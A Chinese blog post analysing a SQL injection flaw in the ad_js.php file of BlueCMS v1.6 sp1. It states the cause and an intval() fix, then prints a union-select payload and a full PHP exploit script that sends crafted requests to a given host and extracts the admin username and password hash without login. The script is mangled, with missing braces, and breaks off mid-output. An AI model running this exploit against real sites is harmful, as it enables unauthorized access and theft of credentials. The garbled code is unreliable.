ad_js.php漏洞防护,BlueCMS v1.6 sp1 ad_js.php SQL注入漏洞分析

川长思鸟来 2023-01-19 04:48 36阅读 0赞

BlueCMS(地方分类信息门户专用CMS系统)

基于当今最流行的开源组合PHP＋MYSQL开发

每个分类均可单独设置Title、Keywords、Description，方便SEO

强力模板引擎，显示风格自由定义，随心所欲

多功能模块插件，操作简单方便

智能缓存技术，提高网站性能

多属性模型自定义，栏目功能强大

缺陷文件：ad\_js.php

漏洞成因：

12: $ad\_id = !empty($\_GET\['ad\_id'\]) ? trim($\_GET\['ad\_id'\]) : ''; //根目录下其他文件都做了很好的过滤，

对数字型变量几乎都用了intval()做限制，唯独漏了这个文件，居然只是用了trim()去除头尾空格。。

19: $ad = $db->getone("SELECT \* FROM ".table('ad')." WHERE ad\_id =".$ad\_id); //直接代入查询。。汗。

修补方案：

$ad\_id = !empty($\_GET\['ad\_id'\]) ? intval($\_GET\['ad\_id'\]) : '';

漏洞Poc：

(admin\_name,0x7C0D0A,pwd),concat(admin\_name,0x7C0D0A,pwd)%20from%20blue\_admin%

20where%20admin\_id=1

右键查看源代码得到返回数据。

漏洞Exp：

print\_r('

\------------------------------------------

BlueCMS v1.6 sp1 "ad\_js.php" SQL Injection

get admin\_user pwd-hash without login

by CnCxzSec衰仔 http://hi.baidu.com/cncxz

\------------------------------------------

');

if($argc<3)\{

print\_r('

\------------------------------------------

usage:php '.$argv\[0\].' host path

host: without "http://"

path: path to bluecms

example:

php '.$argv\[0\].' localhost /

\------------------------------------------

');

die;

$host=$argv\[1\];

$path=$argv\[2\];

$inj="/ad\_js.php?ad\_id=1%20and%201=2%20union%20select%201,2,3,4,5,concat

(admin\_name,0x7C0D0A,pwd),concat(admin\_name,0x7C0D0A,pwd)%20from%20blue\_admin%

20where%20admin\_id=1";

print\_r("\[\*\]exploiting, please wait...");

$fp=fsockopen($host, 80, $errno, $errstr, 30);

if(!$fp) echo "$errstr($errno)  
\\n";

else\{

$head ="GET $path"."$inj HTTP/1.1\\r\\n";

$head .="Host:".$host."\\r\\n";

$head .="Connection: Close\\r\\n\\r\\n";

$result='';

fputs($fp,$head);

while(!feof($fp))\{

$result .=fgets($fp,4096);

if (!eregi("document",$result))\{

$temp=explode("FROM ",$result);

if(isset($temp\[1\]))\{$temp2=explode("ad",$temp\[1\]);\}

if($temp2\[0\])

$prefix=$temp2\[0\];

print\_r('

\[\*\]prefix -> '.$prefix);

$inj="/ad\_js.php?ad\_id=1%20and%201=2%20union%20select%201,2,3,4,5,concat

(admin\_name,0x7C0D0A,pwd),concat(admin\_name,0x7C0D0A,pwd)%20from%20".$prefix."admin%

20where%20admin\_id=1";

$fp=fsockopen($host, 80, $errno, $errstr, 30);

if(!$fp) echo "$errstr($errno)  
\\n";

else\{

$head ="GET $path"."$inj HTTP/1.1\\r\\n";

$head .="Host:".$host."\\r\\n";

$head .="Connection: Close\\r\\n\\r\\n";

$result='';

fputs($fp,$head);

while(!feof($fp))\{

$result .=fgets($fp,4096);

fclose($fp);

$rs1=strstr($result,"\\"");

$name=substr($rs1,1,strpos($rs1,"")-1);

$pass=substr($rs1,strpos($rs1,"")+5,32);

print\_r('

\[\*\]we get it!');

print\_r('

username:'.$name);

ad_js.php漏洞防护,BlueCMS v1.6 sp1 ad_js.php SQL注入漏洞分析

发表评论取消回复

还没有评论，来说两句吧...

相关阅读

相关 Oracle PL/SQL安全漏洞分析：防护策略

相关 SQL注入攻击：MySQL防护措施和漏洞案例

相关 Oracle SQL注入漏洞分析及防御手段

相关 SQL 注入漏洞攻击

相关 JDBC的SQL注入漏洞分析和解决

相关 SQL注入漏洞防护看这一篇就够了！

相关 JDBC的SQL注入漏洞

相关 web漏洞-SQL注入漏洞、目录遍历漏洞、文件下载漏洞

相关 ad_js.php漏洞防护,BlueCMS v1.6 sp1 ad_js.php SQL注入漏洞分析

相关 PHP安全：XML注入漏洞防护